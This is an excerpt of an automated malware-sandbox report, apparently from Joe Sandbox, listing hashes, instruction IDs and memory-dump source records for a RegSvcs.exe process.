                                                        • Instruction ID: 12ce2ed6ec5471101bb7e69369371730fa0cf1e2f0b5ccda67ff55f80c08a4b1
                                                        • Opcode Fuzzy Hash: 779c19c1bea26a37e1371a42018cf1b7333dad58b262ca47167512b8b15c3a5a
                                                        • Instruction Fuzzy Hash: 06515A347101168BCB08EF68E490A6F77A3FF89705F108139D406AB3A5DF789C06CB91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 11443241a2b989528ec8b655dc4a4eeac46635ada24744fc9fa14b0af5027312
                                                        • Instruction ID: 425e93902afccc4a2e62292e2182bc86975d90fd88f1815cd0e22ffdd1b974a6
                                                        • Opcode Fuzzy Hash: 11443241a2b989528ec8b655dc4a4eeac46635ada24744fc9fa14b0af5027312
                                                        • Instruction Fuzzy Hash: 5351A0716002069FD714EF64D8857AE77F3FB88324F108828C506AB7A5DF79AD05CB51
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 841df1b6c26d1e5dcb48a51c175072a39c631a665681f0960471802c00732933
                                                        • Instruction ID: 9dadcfda4bf73f9b3a419da4dfd1c3692e8bcbd42fc3553ad26216dbae57b82c
                                                        • Opcode Fuzzy Hash: 841df1b6c26d1e5dcb48a51c175072a39c631a665681f0960471802c00732933
                                                        • Instruction Fuzzy Hash: 845157347101168BCB18EF68E494A6F77E3FF89701F608129D406AB3A5DF78AC06CB91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 17a0eb1bbb43b6af650b22b143334e255099af90a42924e9b60b93f3e9d1e5d1
                                                        • Instruction ID: 8873d917c4dc1f081c5b27bcfd2f454c97e8eb7313dc2e78b84bced7df5f6104
                                                        • Opcode Fuzzy Hash: 17a0eb1bbb43b6af650b22b143334e255099af90a42924e9b60b93f3e9d1e5d1
                                                        • Instruction Fuzzy Hash: CD41E435B102049FDB49EF98D945AAFBBF6FB8C310F504069E606A7390DF399D018B91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1cae4dbaf824ec4daa36cd984c62f9b72a82c83242342b452e84b9d37b3917d5
                                                        • Instruction ID: c6f4bf57ace172b7306ea1a27eb39a0cc9380f7cca227d628f1b3b3e40b96761
                                                        • Opcode Fuzzy Hash: 1cae4dbaf824ec4daa36cd984c62f9b72a82c83242342b452e84b9d37b3917d5
                                                        • Instruction Fuzzy Hash: 44419F306002099BD714EF64E884BAFB7E7FB88324F108828D5066B7A5DF79AD45CB95
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5970b3b96f502b7c2e07ae3d92da3d10380f7e1b7217ce7b49f0283859b3abad
                                                        • Instruction ID: 8f63b92b72ab69259cf674e31e8fb133da0e66e6c8d78d4357419c921a7e18f2
                                                        • Opcode Fuzzy Hash: 5970b3b96f502b7c2e07ae3d92da3d10380f7e1b7217ce7b49f0283859b3abad
                                                        • Instruction Fuzzy Hash: E651DA74A002168FD754DF28D598A6EB7F2FF88340F5081B9D40AAB3A5DB799D42CF81
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 198f7c73f8096a9d143312c5e342c76607e82e4d2de25376dee1eb2211e02f63
                                                        • Instruction ID: 402d426553a7fa427f7b42de79ff25391c74052e3c9113789b505f381058bd72
                                                        • Opcode Fuzzy Hash: 198f7c73f8096a9d143312c5e342c76607e82e4d2de25376dee1eb2211e02f63
                                                        • Instruction Fuzzy Hash: BB51DA74A002168FD754DF28D598A6EB7F2FF88340F5081B9D40AAB3A5DB789D42CF81
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e99ff24244d429b33295c2fe2a2c6640d57f0c3755a66ba66e52bf23f2ad7654
                                                        • Instruction ID: 8122c317e91a2ef8838a6c0ac61aa1c5d39c2d19babdc2af480bfb33e5e54615
                                                        • Opcode Fuzzy Hash: e99ff24244d429b33295c2fe2a2c6640d57f0c3755a66ba66e52bf23f2ad7654
                                                        • Instruction Fuzzy Hash: A6418E70A043499FCB15DFB9C840AAABBF5BF89220B048669E449CB752D730ED05CBD1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aa706874f262e95814f72d1d5c8b91bcfa75c28eaf98c1fe57b0ddf932529bb9
                                                        • Instruction ID: 64a5d21feee0af00ce22d6cfd8edd11d0dab1d445648f53668bdfbf57711aa7a
                                                        • Opcode Fuzzy Hash: aa706874f262e95814f72d1d5c8b91bcfa75c28eaf98c1fe57b0ddf932529bb9
                                                        • Instruction Fuzzy Hash: 1841EF702106029BC344EF68E8406AFBBE6FF88314F508179D14ADB791DF75AD05CB91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d20ebe01949affa45ab64bd48c54ff3061774065bce4edbdb01435a0b8df6ca3
                                                        • Instruction ID: 8d0be30fb759ac9881a82f6988a7d75a80f51b0830c46904c28e2ace13ade2b9
                                                        • Opcode Fuzzy Hash: d20ebe01949affa45ab64bd48c54ff3061774065bce4edbdb01435a0b8df6ca3
                                                        • Instruction Fuzzy Hash: 3B414938B10508CFD704DFA8D598BA97BF2BF89314F1980A9E506AB365CB74AC81CB50
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 74b6290bb51e322edd328f62d9725a881f2e5af69b9899b4aff22e04309750c3
                                                        • Instruction ID: 9e2a803fb2ee91f2cfb1d281231946f9d59d1dc20933f32ef05f58a35fae5e9c
                                                        • Opcode Fuzzy Hash: 74b6290bb51e322edd328f62d9725a881f2e5af69b9899b4aff22e04309750c3
                                                        • Instruction Fuzzy Hash: E4316D757002099FDB14DF94E9589AA7BB7FFC8310F108024EA0AAB395DA759C15CB90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8af209fb659b61d96321b1451554441c7220bdcc6130fc17beb08429d8d03a54
                                                        • Instruction ID: 5672c9f4b2df9f30d5aeb1de5d89b180169eb95f922f4e53f5bc2c140e18fe97
                                                        • Opcode Fuzzy Hash: 8af209fb659b61d96321b1451554441c7220bdcc6130fc17beb08429d8d03a54
                                                        • Instruction Fuzzy Hash: 7141AC35B102009FDB49EF98D955AAFBBF7FB8C314B104068E606A73A4DF399C058B91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d7cda0b8656f1e6ffb71c98a37d27bd13c8fb8177f362c20152dce81950ff0da
                                                        • Instruction ID: a3797004d371de94e333fef6f6f5e15c4d05da56de99c345be408112aa198c0e
                                                        • Opcode Fuzzy Hash: d7cda0b8656f1e6ffb71c98a37d27bd13c8fb8177f362c20152dce81950ff0da
                                                        • Instruction Fuzzy Hash: DE419135B102049FDB45EF98D945A6FBBE7FB8C714B508068E606A7394CF399C05CB91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 70c064d286bc19a3ce8b2fee5d28cc7174bb5d966b22c38c45ab1a37a1c21361
                                                        • Instruction ID: 74748b0a19f1a77a95c7e092a7ef98d89cf7cfc67a1eb39a7a8035b16d8cd80f
                                                        • Opcode Fuzzy Hash: 70c064d286bc19a3ce8b2fee5d28cc7174bb5d966b22c38c45ab1a37a1c21361
                                                        • Instruction Fuzzy Hash: 1731D031B102598BCB54EF68E90466F77AAEBC4715B208435DA46D7388DF388D06CBD1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: df170206b0b2df5a4a48ae399425633cbf017afe700d4324b722b1d8296befba
                                                        • Instruction ID: e09feaf03f9df83bfd86a91d4d0fc8c6c039ecd58da204764adff5eba5da7cfa
                                                        • Opcode Fuzzy Hash: df170206b0b2df5a4a48ae399425633cbf017afe700d4324b722b1d8296befba
                                                        • Instruction Fuzzy Hash: 6741D335B10505DFCF06AFA4E908DAE7BB3FF88300B108159E504AB361EB3AD965DB81
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5b4f649ff8a6dc2dc4c47a8be3425419f180834345d2e1e77afcd4a22f3f3fb3
                                                        • Instruction ID: b41a70d67fcb48b4816dfb8406f7562bd07fce9566f500f99a15c0cc57b53b41
                                                        • Opcode Fuzzy Hash: 5b4f649ff8a6dc2dc4c47a8be3425419f180834345d2e1e77afcd4a22f3f3fb3
                                                        • Instruction Fuzzy Hash: 9741A074B012168FDB15DF68D9946AF7BF2FF88314F108029D60AA7395DB386C56CB81
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 935c0af966183c683f8a89114fdf2780b263fcfd06b1815f30d35941b0425f90
                                                        • Instruction ID: bd3f80b534e1a0eff73b9517c696b74550510be7b11ac705d03a3a84fdb92763
                                                        • Opcode Fuzzy Hash: 935c0af966183c683f8a89114fdf2780b263fcfd06b1815f30d35941b0425f90
                                                        • Instruction Fuzzy Hash: 2241E875E012199FCB18DFA8D994AEEB7F2FF88314F00446AD512AB360DB35A904CF90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3915ecbc9e42f9b56aaac675d7f2bddc98feca0b4ca158089aa621601567927b
                                                        • Instruction ID: c338797758e9906a89957b136fe939cfcd72b0bc2d5aedeba5f073b678892380
                                                        • Opcode Fuzzy Hash: 3915ecbc9e42f9b56aaac675d7f2bddc98feca0b4ca158089aa621601567927b
                                                        • Instruction Fuzzy Hash: 3A31AE397102009FDB49DF54D945A6FBBA7FB8C714F108068E606AB3A4CF399C06DB91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b05b096521e5303d52a5b5b5f8dfb38d104f67339aec20d68dc93750c79af7a9
                                                        • Instruction ID: a8a1df3dd3b528fd3f1b730d015cd7f969ae86fcd91dd37f35ebdfffc6f0699a
                                                        • Opcode Fuzzy Hash: b05b096521e5303d52a5b5b5f8dfb38d104f67339aec20d68dc93750c79af7a9
                                                        • Instruction Fuzzy Hash: B4413F70A00209DFDB18DFE5C594BAEBBB2BF88315F649668D0069B391CB359D42CF50
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800680499.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d40000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b26af3aa69bf52844e2cc281b8f1ee82fdd0da1218d424f18124e9cfdf10209a
                                                        • Instruction ID: c501149942901657c1fd225bf9bee67f2124656b33bbb14008deffe64ad2e991
                                                        • Opcode Fuzzy Hash: b26af3aa69bf52844e2cc281b8f1ee82fdd0da1218d424f18124e9cfdf10209a
                                                        • Instruction Fuzzy Hash: 6531E135F057468FCB119B6899A42AE7BB6EFA621871440ABC446D7355EF30CC06C792
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 379f3669e1b830e23de862282d1c20ada6b2e7deabbb17ccfa1fe67f749f3861
                                                        • Instruction ID: c2fff63152db73ba9c8b72fb3041d778eb21acc84c7aa7dae36bb0049afcb6f9
                                                        • Opcode Fuzzy Hash: 379f3669e1b830e23de862282d1c20ada6b2e7deabbb17ccfa1fe67f749f3861
                                                        • Instruction Fuzzy Hash: 9A3195327046158FC725EF68E880AAF77F6FF85250B1505BAD409EB751DB75AC01C790
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cf16a9252e3a5d03ea3bab06e247dd32c2e95cd568c20b77f23b8473b505a0af
                                                        • Instruction ID: 3d96a1e73ab6527a1dd642e28ac283e6aa79aa9b0466ad6b11ea068b3417628e
                                                        • Opcode Fuzzy Hash: cf16a9252e3a5d03ea3bab06e247dd32c2e95cd568c20b77f23b8473b505a0af
                                                        • Instruction Fuzzy Hash: AF313E726001596F8F128ED59C508FFBFFEFB4D201B044066FA55E2151DA39DA25ABB0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 94b13bf65f8023a3475d64703193d7c995629736817c2b14fb04d361e54f53cc
                                                        • Instruction ID: e26e39a356450a370909f45fe03207764b72dc846f4c972c54a1157c7febdc89
                                                        • Opcode Fuzzy Hash: 94b13bf65f8023a3475d64703193d7c995629736817c2b14fb04d361e54f53cc
                                                        • Instruction Fuzzy Hash: B341F0B1D00348DFDB14CFA9C984ADEBBB5BF48314F14842AE909AB250DBB59985CF90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 651afaa2afd1a255a501e9cd06c6e52f41e37d3f3a56eb3aa27b65bf16893cdc
                                                        • Instruction ID: bc385d2124e79352d512c087432a1c83d78c9234853479a716e3898a4f1bfb84
                                                        • Opcode Fuzzy Hash: 651afaa2afd1a255a501e9cd06c6e52f41e37d3f3a56eb3aa27b65bf16893cdc
                                                        • Instruction Fuzzy Hash: 3D41C0B1D003489FDB24DF99C484ADEBBB5BF48314F148029E909AB250DBB5A945CF91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6e8ee458845176c3fba9022a402e242a56cf091a72b6bd3e13ac1dc61b0618f2
                                                        • Instruction ID: 395e9dcef4b80137ed40e0945482383cf1d260102a10a3e492b6a5044100ea2d
                                                        • Opcode Fuzzy Hash: 6e8ee458845176c3fba9022a402e242a56cf091a72b6bd3e13ac1dc61b0618f2
                                                        • Instruction Fuzzy Hash: C4318D31E006158BDB58DF59D8446AFB7B6FBCA721F24812AC902B73A4CB796C01CBD5
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1e3bef727192f8c6df1f064866a23dce906601ec02a7d886689c775f23aca5e6
                                                        • Instruction ID: 260577c4809f86072847a2db00be11e9690120edca2d664dbe1fcba0241cbc28
                                                        • Opcode Fuzzy Hash: 1e3bef727192f8c6df1f064866a23dce906601ec02a7d886689c775f23aca5e6
                                                        • Instruction Fuzzy Hash: AB31E574B047158FCB518F6898507AFBBE6FB89304F144079EA46D7385DB78DC068BA1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5172ab7427503cf9cc80c5923d75e13a6745315775776c61d6cc85187c3d5773
                                                        • Instruction ID: 24b88fc88db31ef52c159e5498d16bd86af880e50720f816e254e0c87dbc3b19
                                                        • Opcode Fuzzy Hash: 5172ab7427503cf9cc80c5923d75e13a6745315775776c61d6cc85187c3d5773
                                                        • Instruction Fuzzy Hash: 2C316D34B142199BDB18EB64D954ABF77B3FF89640F10902AD802E7394DF78AC02CB95
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3309daa323d4c13081c8d3a60bdf6feb5f73712ab68d481078274633d33d7a22
                                                        • Instruction ID: ca4e4a69d0f09d754e24c9724343dc87c5b4f83a5f252e884289dee828acaaee
                                                        • Opcode Fuzzy Hash: 3309daa323d4c13081c8d3a60bdf6feb5f73712ab68d481078274633d33d7a22
                                                        • Instruction Fuzzy Hash: 0C31DF35A005099BDB14DFA8C854AEFBBB6EBCC320F248129E512E7394CF785C028F91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 539684af4fea7881a2779fdae9769efb42490168c367c3f5387a4d3a263df603
                                                        • Instruction ID: 8f44ff398eae8dc7ee992a0f335d085951ed97d6992e7de8805f96a3b91cc66c
                                                        • Opcode Fuzzy Hash: 539684af4fea7881a2779fdae9769efb42490168c367c3f5387a4d3a263df603
                                                        • Instruction Fuzzy Hash: D231BB743002499FDF02DF69C850AAB7BAAEB89240F148066FD44D7391EB39DC41DBA0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 41a09cb1c3b07d4936c04035805ac54af9ca1992e2a6b501afa7db55a97c35fd
                                                        • Instruction ID: c8800935b7141daba775ba88dbec32cfe52682ab135ee59409778b49590283b7
                                                        • Opcode Fuzzy Hash: 41a09cb1c3b07d4936c04035805ac54af9ca1992e2a6b501afa7db55a97c35fd
                                                        • Instruction Fuzzy Hash: 9431EC753042849FDB46DF28C890AAB7BAAEF8A200B148066F944D7391EB39CC01DB60
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6efb2d2fe95ecdc00eff98532ab569b8e786d6f4b29350fe3d9128e9ef052d3a
                                                        • Instruction ID: 8ce0067ca0de4608440e1e142b8d3eda99f460be15a88217031c852668742936
                                                        • Opcode Fuzzy Hash: 6efb2d2fe95ecdc00eff98532ab569b8e786d6f4b29350fe3d9128e9ef052d3a
                                                        • Instruction Fuzzy Hash: 3F319530A002059FC744EF68D880A9FBBF6FF89318B548569E50A9B361DB75AD06CF91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c32fea2690a918d26f89cd0a3a0b4e06bc073bc2bd2cb7e89d295fe1068da01e
                                                        • Instruction ID: 11c6eec20aedcc3bc68ed7c8d9fe79fd29f1bbfab327abd2dfc3c0ca8a0e958c
                                                        • Opcode Fuzzy Hash: c32fea2690a918d26f89cd0a3a0b4e06bc073bc2bd2cb7e89d295fe1068da01e
                                                        • Instruction Fuzzy Hash: 1321E536700214AFDB05CF90E94489A7BB7FF88310B148065E606AB362CA36DC15CB90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4daae69af1f1911301ab42a253b562b56d89a4c578f80ae5e5f4c4ee7e80df2b
                                                        • Instruction ID: 1b1b398e9a233d2662c0d8f5bbe5a20391fe0af332e9096c8b3fb50dd14e87f4
                                                        • Opcode Fuzzy Hash: 4daae69af1f1911301ab42a253b562b56d89a4c578f80ae5e5f4c4ee7e80df2b
                                                        • Instruction Fuzzy Hash: 7E31A434A142199BCB18DF64D954ABF77B3FF89340F109069D802A7394DF78AC02DB91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3efd52a1f2fb3083dba43067c84ff5846e9ecedb477e2e827475053928beaef0
                                                        • Instruction ID: 5d54fefadde68d7fca8941e425733b6cb8a5dca085480ab81cf4e4e0efb359a6
                                                        • Opcode Fuzzy Hash: 3efd52a1f2fb3083dba43067c84ff5846e9ecedb477e2e827475053928beaef0
                                                        • Instruction Fuzzy Hash: C531C335A005199BCB14DF98C954AAFBBBAEBCC310F608029E502E7394CF745C028F91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 728da337884dbf3065178d5778620638435f6e2f7e11f847813fb62483435e74
                                                        • Instruction ID: deefc18816dcc557b9942abd5eebba48db813a3db690758554a7c4c121e8295f
                                                        • Opcode Fuzzy Hash: 728da337884dbf3065178d5778620638435f6e2f7e11f847813fb62483435e74
                                                        • Instruction Fuzzy Hash: DB219234B107049BDB54DF68994076FBBE6EBC8704F208429EA0AD7384DE74DC018BA1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 971b4eca20b5f99025b06ea9a9a865c47562d5012fbfa97c181c66ccf10b8038
                                                        • Instruction ID: 44a894ed2981f9da48565294576d13ab8bdeed6b557b0ace6dc0592bd6294ef7
                                                        • Opcode Fuzzy Hash: 971b4eca20b5f99025b06ea9a9a865c47562d5012fbfa97c181c66ccf10b8038
                                                        • Instruction Fuzzy Hash: 8A2103307102958FCB55EF64D91466F7BA6EBC4704B20846ADA86D73D4DB38CE06CBA2
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
